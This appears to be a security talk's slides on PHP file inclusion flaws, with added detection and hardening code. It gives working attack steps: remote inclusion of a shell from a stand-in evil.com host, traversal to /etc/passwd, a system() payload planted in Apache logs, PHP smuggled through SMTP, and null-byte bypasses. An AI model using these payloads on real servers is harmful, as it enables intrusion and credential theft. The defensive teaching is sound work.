Tim Strijdhorst - Team THC - Inclusion Vulnerabilities

Speaker: Tim Strijdhorst
Group: TeamTHC

File Inclusion Vulnerabilities


Disclaimer

The author of this talk is not responsible for what you do with this information.

If you go out there and act like a script kiddie, it's not only illegal, it's also pretty lame.


Introduction

This talk covers the LAMP stack:

PHP, Apache, Linux, MySQL

It assumes a standard configuration (file locations can differ from server to server).

All the theory applies to other software stacks as well.

So you are anything but safe if you use Windows with ASP and IIS.


What is an inclusion vulnerability?

It is driven by user input.

As with SQL injection, the developer is too trusting (or too careless).

Code often includes/imports other files, because of the size of the code base and for proper design.

Dynamic inclusion, where the file name comes from user input, is where it goes wrong.

**YOU HAVE TO FILTER USER INPUT**


What is user input?

A lot of things, some you wouldn't expect:

GET data (URL variables)
POST data
Header data (the User-Agent, for example)
Cookies (just client-side text files)
XMLHttpRequests (AJAX)

THE USER IS NOT TO BE TRUSTED


Definition of inclusion vulnerability

There are 2 types of inclusion vulnerabilities:

Local File Inclusion (LFI)
Remote File Inclusion (RFI)

RFI is less common these days: it needs a PHP older than 5.2 (where allow_url_fopen alone lets include() fetch URLs) or a php.ini that turns on allow_url_include. A lot of web hosts still run PHP 4 though.

One of the easiest ways to lose your server.


Example code

index.php:

<?php
include($_GET['page']);
?>

test.html:

<html>
<head><title>Example</title></head>
<body>This is an example of an included HTML page</body>
</html>

Developer intended use: http://localhost/index.php?page=test.html

Outputs the content of test.html

What's the vulnerability here?


Vulnerability explained

Let's say the PHP version is 4.3.

Vulnerable to both remote and local inclusion.

Let's say our input is:

http://localhost/index.php?page=http://www.google.com

The code effectively becomes:

<?php
include("http://www.google.com");
?>

Which is completely valid PHP code (given the above circumstances): PHP fetches the URL and executes whatever comes back.


Vulnerability explained

Let's say our input is: http://localhost/index.php?page=otherfile.txt

The code effectively becomes:

<?php
include("otherfile.txt");
?>

Still very valid PHP code, which outputs the content of otherfile.txt (and executes any PHP tags that file happens to contain).


Why is this so awesome?


Basic exploitation of RFI

Use a PHP shell (the most popular one out there is c99shell).

Let's say it's stored at http://evil.com/shell.txt (the file contains the PHP source; the .txt extension makes evil.com serve the source instead of executing it).

Let's say our input is:

http://localhost/index.php?page=http://evil.com/shell.txt

PHP will include shell.txt and execute the code it contains, on the target server.


The server is ours


Basic exploitation of LFI

Almost every PHP app has a config file.

Most likely the almighty config.php, which usually holds the database credentials.

Example:

<?php
$CONFIG['database']['hostname'] = 'localhost';
$CONFIG['database']['username'] = 'root';
$CONFIG['database']['password'] = 'secret';
$CONFIG['database']['database'] = 'lolwut';
?>

Keep in mind that include() executes a .php file rather than printing it, so the credentials only show up when the file is read by something that outputs it (next slide) or when the variables get echoed somewhere else.

In most applications: access to the database → administrator.


Basic exploitation of LFI

This can also be used with:

Other functions (require, fopen, etc.)
Reading all non-PHP files (password files maybe?)
Reading code, if the page doesn't use include() but actually outputs the file (highlight_file, for example)


Advanced LFI Tricks

Using directory traversal to read files

Injecting code into logs

Injecting code into session variables

Injecting code into environmental variables

Injecting code into other files

Injecting code into mail

Shared hosting


Basic UNIX background

Your current directory: /home/tim/

The name for the current directory is '.'

Like: './lol.sh' executes the lol.sh script inside /home/tim/

The name for the parent directory is '..'

Like: '../lol.sh' executes the lol.sh script inside /home/

But also: 'cat ../../etc/passwd' will work just fine


Using directory traversal

Website is located at: /var/www/public/index.php

It seems like we can only read files from /var/www/public/

Wrong: use the default Unix parent-directory name '..'

For instance: http://localhost/index.php?page=../../../etc/passwd

(three levels up from /var/www/public/ is the filesystem root)

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
........


Injecting code into logs

Some information about the Apache access.log:

Example location: /var/log/apache2/access.log
It logs all requests, including the requested path and the User-Agent header

A User-Agent is also user input, since it's a spoofable header.

The web server can read the log if it's configured that way; 99% of the time this is the case. (Caveat: on Debian/Ubuntu the file is owned root:adm with mode 0640 and www-data is not in adm by default, so check before relying on it.)

Example (trimmed):

"GET /index.php HTTP/1.1" 200 2807 "http://localhost/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Firefox/3.5.8"


Injecting code into logs

Send a request with a User-Agent like:

<?system($_GET['c']);?>   // arbitrary command execution

(This uses the short open tag '<?'; if short_open_tag is off, use '<?php system($_GET['c']); ?>'.)

The log entry then looks like this:

"GET /index.php HTTP/1.1" 200 2807 "http://localhost/" "<?system($_GET['c']);?>"

Example exploit:

http://localhost/index.php?page=../../log/apache2/access.log&c=cat /etc/passwd

Including the log runs every PHP tag in it, so the injected system() call executes with the web server's privileges.

Tadaa, another server is yours <(^_^<) <( ^_^ )> (>^_^)>
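As an added example that is not part of the talk, here is a small detector in Python that runs over Apache combined-log lines and flags both halves of the attack just described: PHP tags or code-execution sinks smuggled into the User-Agent or referer, and traversal, null-byte or log-file targeting in the request line. The sample log lines are constructed for this example; the log format is Apache's default "combined" format.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# Apache "combined" log format (the Debian/Ubuntu default).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# PHP open tags (long and short form) and the usual code-execution sinks.
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=|[a-z_\s])', re.IGNORECASE)
PHP_SINK_RE = re.compile(
    r'\b(system|passthru|exec|shell_exec|eval|assert|popen|proc_open)\s*\(', re.IGNORECASE)
# Directory traversal, checked after URL-decoding.
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\')
# Null-byte suffix bypass, checked on the raw request line.
NUL_RE = re.compile(r'%00|\x00')
# Files an LFI attacker wants to include: logs, /proc/self/environ, session files.
TARGET_RE = re.compile(r'(access|error|mail)\.?log|/proc/self/environ|/sess_', re.IGNORECASE)


@dataclass
class Finding:
    ip: str
    reasons: list = field(default_factory=list)


def decode_twice(s: str) -> str:
    """URL-decode two rounds so double-encoded %252e%252e%252f is caught too."""
    return unquote(unquote(s))


def inspect_line(line: str):
    """Return a Finding for a suspicious access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    for name in ("ua", "referer"):
        value = m.group(name)
        if PHP_TAG_RE.search(value) or PHP_SINK_RE.search(value):
            reasons.append(f"php code in {name}")
    raw_path = m.group("path")
    path = decode_twice(raw_path)
    if TRAVERSAL_RE.search(path):
        reasons.append("directory traversal in request path")
    if NUL_RE.search(raw_path):
        reasons.append("null byte in request path")
    if TARGET_RE.search(path):
        reasons.append("request targets a log, environ or session file")
    return Finding(m.group("ip"), reasons) if reasons else None


def scan(lines):
    """All findings, in log order."""
    return [f for f in (inspect_line(l) for l in lines) if f]


# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Mar/2010:12:00:01 +0100] "GET /index.php?page=test.html HTTP/1.1" 200 2807 "http://localhost/" "Mozilla/5.0 (X11; U; Linux i686) Firefox/3.5.8"',
    '10.0.0.9 - - [10/Mar/2010:12:00:02 +0100] "GET /index.php HTTP/1.1" 200 2807 "http://localhost/" "<?system($_GET[\'c\']);?>"',
    '10.0.0.9 - - [10/Mar/2010:12:00:03 +0100] "GET /index.php?page=../../log/apache2/access.log&c=cat%20/etc/passwd HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Mar/2010:12:00:04 +0100] "GET /index.php?page=%252e%252e%252fetc/passwd%00 HTTP/1.1" 200 1337 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.ip, "->", "; ".join(f.reasons))
```

The poisoned User-Agent is flagged on the request that plants it, one line before the request that includes the log, which is the order an analyst will see in the file.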


Injecting code into session variables

By default session files are located at /tmp/sess_<PHPSESSID>

If you can get your input stored in a session variable, it is saved in that session file (serialized, but as plain text).

You can find the session id in your cookies (the PHPSESSID cookie).

Include that file and the PHP tags in your input get executed. Vulnerable pattern:

<?php
session_start();
$_SESSION['lol'] = $_POST['userinput'];
?>


Injecting code into environmental variables

Every process has an entry in the /proc directory; /proc/self refers to the process directory of whichever process accesses it.

/proc/self/environ holds the environment variables of that process. When PHP runs as CGI/FastCGI, the request headers are exported there as HTTP_* variables, including the User-Agent, which we can inject code into. (With mod_php the worker's environment normally does not carry the request headers, and /proc must be readable by the web server user.)

Example content:

PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin

[email protected]

...

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4

HTTP_KEEP_ALIVE=300


Injecting code into other files

Some websites offer image uploads (avatars, photo galleries, etc.) which aren't checked properly (file extension, MIME type).

We can construct a valid .jpeg that contains PHP code in its metadata (an EXIF field or a comment segment).

This passes any validation that only looks at the extension, the MIME type or the image header, and gets uploaded,

hopefully to a predictable location.

We can then include this file in our LFI attack to execute the PHP code: include() doesn't care that the file is an image, it executes every PHP tag it finds.

There are many more ways to get files onto a server:

FTP, badly written upload pages, etc.

Every single one of them can be a way in.


Injecting code into mail

There are three ways to abuse e-mail:

First of all we might send an e-mail to a user on the target server (e.g. [email protected]) and then attempt to include /var/spool/mail/tim. But this will only work on very badly configured, out-of-date servers.

The second method is to include /var/log/maillog after getting PHP code written into it by connecting to port 25, for instance through the sender address:

root@h4xb0x:/# telnet target.com 25
Connected to target.com.
220 hidden.domain.com ESMTP
HELO
250 hidden.domain.com
MAIL FROM: h4x0r <?php phpinfo(); ?>
250 ok
RCPT TO: [email protected]
250 ok
DATA
354 go ahead
Subject: pwnage.
250 ok 1186501618 qp 7063
quit


Injecting code into mail

The third method is to send an e-mail to an existing user, assuming our target server runs a mail server, and attempt to include the mail file itself.

We put our PHP code in the e-mail and then proceed to include the file the mail server created for it.

The qmail layout used by Plesk, for example, is: /var/qmail/mailnames/[targetdomain.com]/[targetuser]/Maildir/new/

The file name format is: <UNIX timestamp>.<PID>.server.domain.com

We could then brute-force the timestamp, starting from an educated guess.

We could attempt to determine the PID from information in /proc/self, or brute-force it.

This attack is quite hard, not likely to succeed, and should be considered a last resort, as it's bound to make a lot of 'noise' on the server.


Shared Hosting

Multiple websites on 1 server (using VirtualHosts)
Most cheap web hosting is shared hosting
Free hosts are almost always shared hosting (and a good target)

Problem? If you are super secure but your IP neighbour is sloppy, you can have a serious problem.


Shared Hosting

You want to hack alice.com.

You can't, it's super secure.

You find bob.com, which is on the same server.

Bob has an inclusion vulnerability. After pwning Bob we have more or less two situations:

The server's file permissions are badly configured and we can access alice.com's files directly

The server's permissions are properly configured, but we can run a privilege-escalation attack (a local kernel exploit, for example)

alice.com is now yours too :)


Defending yourself

Filter user input.

First strip away everything that is not alphanumeric.

Example: $page = preg_replace("/[^a-z0-9.]+/i", "", $page);

Who uses non-alphanumeric chars in a filename anyway?

Or force the file type by appending the extension yourself:

<?php
$page = $_GET['page'].'.html'; // forces the .html file type
include($page);
?>

Wrong again (we'll see why shortly).


Defending yourself

Properly configure your box, this includes:

PHP (php.ini, or safe_mode)
Apache
Operating system (access modes?)
Proper rights management
Apply basedir restrictions (open_basedir)!

If you configure the server properly, the damage can be contained even if someone manages to exploit you.

safe_mode is going away though (it was slated for removal in PHP 6 and was dropped in PHP 5.4), so you'd better configure things right.
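As an added illustration (not from the talk), here is the weak php.ini configuration that makes the earlier slides work, next to the hardened settings for a LAMP box that never needs remote includes. The directives are standard php.ini directives; the web root /var/www/public and the session path are assumptions taken from this talk's example setup.

```ini
; --- Weak: what an RFI/LFI-friendly server looks like ---
allow_url_fopen = On            ; include("http://...") works on PHP < 5.2 with just this
allow_url_include = On          ; PHP >= 5.2 needs this explicitly for include() over URLs
; open_basedir unset: include() may read any file the web server user can read
display_errors = On             ; failed includes print full paths to the attacker

; --- Hardened: same server, remote includes off, filesystem fenced in ---
allow_url_fopen = Off           ; drop http:// streams entirely if the app can live without them
allow_url_include = Off         ; include/require may never fetch URLs (default since 5.2)
open_basedir = /var/www/public:/var/lib/php/sessions   ; every path-based function is confined here
session.save_path = /var/lib/php/sessions               ; sessions need a writable dir inside open_basedir
display_errors = Off
log_errors = On                 ; errors go to the log, not the response
disable_functions = system,passthru,exec,shell_exec,popen,proc_open
```

open_basedir stops traversal to /etc/passwd and the Apache logs, but session and upload directories inside it remain reachable, so the application-level fix (an allow-list of includable pages) is still required.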


Defeating the defense

Does this really force the .html file type?

Nope, there are 2 ways to circumvent it:

Null-byte injection
Question-mark injection

<?php
$page = $_GET['page'].'.html'; // forces the .html file type
include($page);
?>


Nullbyte injection

The null byte is the string terminator in C strings.

Written as \0, or %00 in URL encoding: http://localhost/index.php?page=config.php%00

After decoding, $page == "config.php\0.html"

PHP strings don't care about null bytes (they carry an explicit length), but PHP itself is written in C, and the C library call that opens the file stops reading the path at the first \0. So the file that gets included is config.php, and the appended '.html' is silently dropped.

This works for a lot of other things too (any filesystem function that takes a path, and the same suffix trick with '.php'):

<?php
$page = $_GET['page'].'.php'; // forces the .php file type
include($page);
?>

(PHP 5.3.4 and later reject paths that contain a null byte, so this bypass only works on older versions.)


Questionmark Injection

This only works for remote inclusion.

http://localhost/index.php?page=http://evil.com/shell.txt?

$page == 'http://evil.com/shell.txt?.php'

In a URL, '?' starts the query string (index.php?page=...).

So the '.php' ends up as the query string of the request to evil.com, which ignores it and simply returns shell.txt.

So PHP loads http://evil.com/shell.txt

<?php
$page = $_GET['page'].'.php'; // forces the .php file type
include($page);
?>
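As an added example that is not part of the talk, this Python script serves both the "Defending yourself" slide and the two bypass slides: naive_target() models what the suffix filter really opens under the null-byte and question-mark inputs (it simulates the C-string truncation and the URL query-string split, it does not run PHP), and resolve_page() is the hardened version of what the talk recommends: keep only alphanumerics, check an explicit allow-list of page names, and verify with realpath() that the canonical path stays under the web root. The function names, the allow-list {test, about} and the temporary web root are this example's own assumptions.

```python
import os
import re
import tempfile
from urllib.parse import urlsplit

# ---- Model of the naive filter: $page = $_GET['page'] . '.php'; include($page); ----

def naive_target(user_page: str, suffix: str = ".php") -> str:
    """What the naive suffix filter actually opens for a given input.
    Models the behaviour described in the talk (pre-5.3.4 PHP for the NUL case)."""
    page = user_page + suffix
    if page.startswith(("http://", "https://", "ftp://")):
        # Remote include: the server at the other end ignores the query string,
        # so 'shell.txt?.php' fetches shell.txt.
        u = urlsplit(page)
        return f"{u.scheme}://{u.netloc}{u.path}"
    # Local include: the path goes to a C library call, which stops at the first NUL.
    return page.split("\0", 1)[0]


# ---- Hardened resolver: allow-list + realpath containment + fixed extension ----

PAGE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


class RejectedPage(ValueError):
    pass


def resolve_page(user_page: str, base_dir: str, allowed: frozenset, ext: str = ".html") -> str:
    """Return the absolute path to include, or raise RejectedPage.

    1. The raw value must be a short plain token: no '/', '.', NUL or URL scheme.
    2. It must be in an explicit allow-list of page names.
    3. The canonicalised path must still live under base_dir (defence in depth
       against symlinks and against a future loosening of step 1).
    """
    if "\0" in user_page or not PAGE_NAME_RE.fullmatch(user_page):
        raise RejectedPage(f"bad page name {user_page!r}")
    if user_page not in allowed:
        raise RejectedPage(f"page {user_page!r} not in allow-list")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_page + ext))
    if os.path.commonpath([base, target]) != base:
        raise RejectedPage(f"{target} escapes {base}")
    if not os.path.isfile(target):
        raise RejectedPage(f"{target} does not exist")
    return target


def demo():
    """Run the talk's attacker inputs through both versions.
    Returns (what the naive filter opens, what the hardened resolver does)."""
    attacks = {
        "remote, question mark": "http://evil.com/shell.txt?",
        "local, null byte": "config.php\0",
        "traversal": "../../../etc/passwd\0",
    }
    naive = {name: naive_target(v) for name, v in attacks.items()}

    hardened = {}
    with tempfile.TemporaryDirectory() as base:          # stand-in for /var/www/public
        with open(os.path.join(base, "test.html"), "w") as fh:
            fh.write("<html><body>This is an example of an included HTML page</body></html>")
        allowed = frozenset({"test", "about"})            # 'about.html' deliberately absent
        for name, v in list(attacks.items()) + [("legit", "test"), ("missing", "about")]:
            try:
                hardened[name] = os.path.basename(resolve_page(v, base, allowed))
            except RejectedPage:
                hardened[name] = "rejected"
    return naive, hardened


if __name__ == "__main__":
    naive, hardened = demo()
    for name in naive:
        print(f"{name:22s} naive opens {naive[name]!r:32s} hardened: {hardened[name]}")
    print(f"{'legit':22s} hardened: {hardened['legit']}")
```

The same three steps transfer directly to PHP: in_array($page, $allowed, true) for the allow-list and realpath() plus a prefix check on the web root for containment; with the allow-list in place the suffix is appended to a name you chose, not to attacker input, so neither bypass has anything to work with.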


The point to all this?

You can't trust your users

It could be your grandmother or a hacker, you just don't know.


http://avatar-dev.tsl.utwente.nl

Questions?